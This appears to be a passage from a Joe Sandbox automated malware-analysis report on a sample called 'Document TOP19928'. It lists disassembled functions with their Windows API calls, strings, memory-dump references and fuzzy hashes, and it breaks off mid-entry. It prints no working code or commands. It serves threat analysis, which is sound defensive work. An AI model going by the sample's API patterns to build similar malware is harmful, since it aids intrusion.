API String ID: 1548245697-1075368562
Opcode ID: 65053a500d7f448ddbe9ab119c84e6248594d64fabdaf68f81a01d22f073a7b9
Instruction ID: 52c137c69b59ba54f8f316242701d818b459870f2ada98354d998a41b4ade025
Opcode Fuzzy Hash: 65053a500d7f448ddbe9ab119c84e6248594d64fabdaf68f81a01d22f073a7b9
Instruction Fuzzy Hash: 9A418EB1600328EFDB15CF64D884A9A7FA9FF44320F1580AAAD05DF246D7B1D984CBA0

Function 00857BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0085F910,00000000,?,?,?,?), ref: 00857C4E
GetWindowLongW.USER32 ref: 00857C6B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00857C7B

Strings

SysTreeView32, xrefs: 00857C20

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: ed85b56ca4f50de5dd78b213d6d06708ba88fcaf5a0d9d4001661dbd21f27064
Instruction ID: d518275acdde43b16de491d78d4821f344150461b4ea8e9128b980ed35d72d1f
Opcode Fuzzy Hash: ed85b56ca4f50de5dd78b213d6d06708ba88fcaf5a0d9d4001661dbd21f27064
Instruction Fuzzy Hash: 6231DC31204206AADB219E38DC05BEA37A9FB44325F248725FD75E32E1D734AC558B50

Function 00857648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 008576D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 008576E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 00857708

Strings

SysMonthCal32, xrefs: 0085769B

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: d937d1c0b1cfb861aaca1e5297317f0c45fd8d702c64701bfea32d1227c71c12
Instruction ID: dd7a2d6bea048479d661d86803ea46899f8759aacb2eb544e73603a8f6424c13
Opcode Fuzzy Hash: d937d1c0b1cfb861aaca1e5297317f0c45fd8d702c64701bfea32d1227c71c12
Instruction Fuzzy Hash: D421BF32600219BBDF119EA4DC46FEA3BA9FB98724F110254FE15AB1D0D6B5A8548BA0

Function 00856F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00856FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00856FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00856FDF

Strings

Listbox, xrefs: 00856F77

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 35220eaba4dde6431a9e0afecec8ccafed48fe32bf0a803279ad2c55cfd219e3
Instruction ID: 1b3760343e8be5e7b63eeec837dacbea77ef69fb3a09d0f5d076884c6c88ebd4
Opcode Fuzzy Hash: 35220eaba4dde6431a9e0afecec8ccafed48fe32bf0a803279ad2c55cfd219e3
Instruction Fuzzy Hash: 8A21F232A10118BFDF118F54DC84EAB3BAAFF89761F418124FA04DB190DA71AC25CBA0

Function 0085797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008579E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008579F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00857A03

Strings

msctls_trackbar32, xrefs: 008579B8

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 301c19a5c09bcd3d7e61005f432ed3933b824c0920090a776fd1d71a98500578
Instruction ID: 8999b4baa46d37e687ed6d6f0baa300a530e638c1b9ed3733adb7e3972ef654a
Opcode Fuzzy Hash: 301c19a5c09bcd3d7e61005f432ed3933b824c0920090a776fd1d71a98500578
Instruction Fuzzy Hash: 0711E332244208BBEF119F74DC05FAB3BA9FFC9B65F014529FA41A6091D271A811CB60

Function 0084C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00811D88,?), ref: 0084C312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0084C324

Strings

GetSystemWow64DirectoryW, xrefs: 0084C31E
kernel32.dll, xrefs: 0084C30D

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: bc3e579afbb602661d4a41037dcf2efb434b32be7713e4bb71bad405843ea594
Instruction ID: b51a39eeaa77a6cdae3fd7da63b88f00ea2a79696a09910e88f61ebb7ad6fd52
Opcode Fuzzy Hash: bc3e579afbb602661d4a41037dcf2efb434b32be7713e4bb71bad405843ea594
Instruction Fuzzy Hash: 58E0C270201B03CFCB605F25C804A4676D8FF08356F80C439E995C23A0E778E840CB60

Function 007D4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,007D4C2E), ref: 007D4CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 007D4CB5

Strings

GetNativeSystemInfo, xrefs: 007D4CAF
kernel32.dll, xrefs: 007D4C9E

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: c4e74a2233ee49eeacc39afd76ed4728e61e851d1c1b8a688682f93edb30de1d
Instruction ID: 1589b33cbc1cbaad42edb69066817f6f9e2d65b918fc1f3a625798b5d78b5031
Opcode Fuzzy Hash: c4e74a2233ee49eeacc39afd76ed4728e61e851d1c1b8a688682f93edb30de1d
Instruction Fuzzy Hash: F7D01230550723CFD7205F31DA1860676E5BF05792B11883A9995D6251E678D480C662

Function 007D4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,007D4D2E,?,007D4F4F,?,008962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007D4D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007D4D81

Strings

Wow64DisableWow64FsRedirection, xrefs: 007D4D7B
kernel32.dll, xrefs: 007D4D6A

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 7bb6fd10c4708998c933f5dfb3ba25fb01e93a27aa7b01d0cbad7f863489b6fe
Instruction ID: 569dfd0d6ec37b60ce922d8aa6164b042a215989eebaaf32472079337b853437
Opcode Fuzzy Hash: 7bb6fd10c4708998c933f5dfb3ba25fb01e93a27aa7b01d0cbad7f863489b6fe
Instruction Fuzzy Hash: 48D01730650B13CFD721AF31D80861676E9BF153A2B21883AAAA6D6350E678D880CA61

Function 007D4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,007D4CE1,?), ref: 007D4DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007D4DB4

Strings

Wow64RevertWow64FsRedirection, xrefs: 007D4DAE
kernel32.dll, xrefs: 007D4D9D

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 06b0ab884a701de5fb7601b960d49f78f310d4423e58b3d7f6fbbaf6dda18bb1
Instruction ID: a35f5d70db65c91bfac32b09e3964fbf8edc796c45383d3a49a806fb13e967e1
Opcode Fuzzy Hash: 06b0ab884a701de5fb7601b960d49f78f310d4423e58b3d7f6fbbaf6dda18bb1
Instruction Fuzzy Hash: 91D01731690B13DFD721AF31D808A467AF5FF05396B21883AEAE6D6250E778D880CA51

Function 00851072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,008512C1), ref: 00851080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00851092

Strings

advapi32.dll, xrefs: 0085107B
RegDeleteKeyExW, xrefs: 0085108C

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 2535371917cd4a280f52493a9c1edf937423d262b3487749ec03c64de3484348
Instruction ID: ce19211256fb56a2caea6f5a4ef5b41ff60b027a32e1ec150781cbc2c856c244
Opcode Fuzzy Hash: 2535371917cd4a280f52493a9c1edf937423d262b3487749ec03c64de3484348
Instruction Fuzzy Hash: EED01230550B13CFD7206F75D85861676E5FF45392B118C39A8D5D7291D778C4C0C750

Function 008493F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00849009,?,0085F910), ref: 00849403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00849415

Strings

GetModuleHandleExW, xrefs: 0084940F
kernel32.dll, xrefs: 008493FE

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 31d0ff5ae8fd149715334dc4d0332d6443f90cb972d9d074721a411b97a71012
Instruction ID: a3b4d9f0a82a778b2d8709ff0a882b67de71ce612522c025ae8ff09a7d4f92f8
Opcode Fuzzy Hash: 31d0ff5ae8fd149715334dc4d0332d6443f90cb972d9d074721a411b97a71012
Instruction Fuzzy Hash: B7D01734550B17CFD720AF31DA0D60776E6FF15392B11C83AE9E6D6691EA78C880CB51

Function 00811B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00811B42
__swprintf.LIBCMT ref: 00811B73

Strings

WIN_XPe, xrefs: 00811BB2
%.3d, xrefs: 00811B4D

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: c9c7f5eb3d2d0a6d6ec23026bcd4af0a2e27a1a57eab3c5f1268c732adb46a34
Instruction ID: 76b21ca3c6102c9a0a8f6f74eda165014a03e59e6abe749364a3acea52500070
Opcode Fuzzy Hash: c9c7f5eb3d2d0a6d6ec23026bcd4af0a2e27a1a57eab3c5f1268c732adb46a34
Instruction Fuzzy Hash: ECD0ECA180811CEACE149A9098488FA737CFB04325F100592F602D1540F7289BC4DB25

Function 008276C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53be13f92b62323735c3052337a8296531693415e681670e5cc8115339fde928
Instruction ID: 9c0abc5190a088a87d6ea810232f66ad4e515000f8e4b7952b4b2caf175f2737
Opcode Fuzzy Hash: 53be13f92b62323735c3052337a8296531693415e681670e5cc8115339fde928
Instruction Fuzzy Hash: 2CC15E75A0422AEFCB14CF95D884EAEBBF5FF48714B118599E806EB251D730DD81CB90

Function 0084E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0084E3D2
CharLowerBuffW.USER32(?,?), ref: 0084E415

Part of subcall function 0084DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0084DAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0084E615
_memmove.LIBCMT ref: 0084E628

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 85556c3acdb386a66e31b42f2ebb304ac9a7f6c8dda2805da6e54827886681c5
Instruction ID: 090cd19524694c611c2a092598ba12deffe04e2c858858eafbb3e74079b0fc85
Opcode Fuzzy Hash: 85556c3acdb386a66e31b42f2ebb304ac9a7f6c8dda2805da6e54827886681c5
Instruction Fuzzy Hash: FFC146716083159FC714DF28C480A6ABBE4FF88318F14896EF999DB352D735E906CB82

Function 00826DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00826E04
SysAllocString.OLEAUT32(00000000), ref: 00826EAD
VariantCopy.OLEAUT32 ref: 00826EDC
VariantClear.OLEAUT32(?), ref: 00826F03

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: c102c54bc951c693dbabf12319ff0749d79b1431dfb52290f547b8c6814c1f1f
Instruction ID: fa0494ee080df58bd57b6ddbc7e3a5165e715915e649ea200ba109891fa343a2
Opcode Fuzzy Hash: c102c54bc951c693dbabf12319ff0749d79b1431dfb52290f547b8c6814c1f1f
Instruction Fuzzy Hash: 4351C730604715DBDB30AF6AF895A2AB3E5FF48310F20881FE656CB291EF7498D49B15

Function 00859A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00F0E1B8,?), ref: 00859AD2
ScreenToClient.USER32(00000002,00000002), ref: 00859B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00859B72

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 1de5436c8a20100b2afd17653d6b0ce7deacaa29994291414cee232662072f00
Instruction ID: ec74f6397d3d6ecf382880239266a7eb475ec6349a4fdd3f59a07aa9e17f0f3f
Opcode Fuzzy Hash: 1de5436c8a20100b2afd17653d6b0ce7deacaa29994291414cee232662072f00
Instruction Fuzzy Hash: 80516A34A00219EFDF10DF68D880AAE7BB6FB54361F14826AFC55DB290D730AD45CB91

Function 0083BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0083BB09
GetLastError.KERNEL32(?,00000000), ref: 0083BB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0083BB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0083BB80

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 99f04bb447f87a5c3ae063b9ed4e75752911588607176d9802782aaa30498a8c
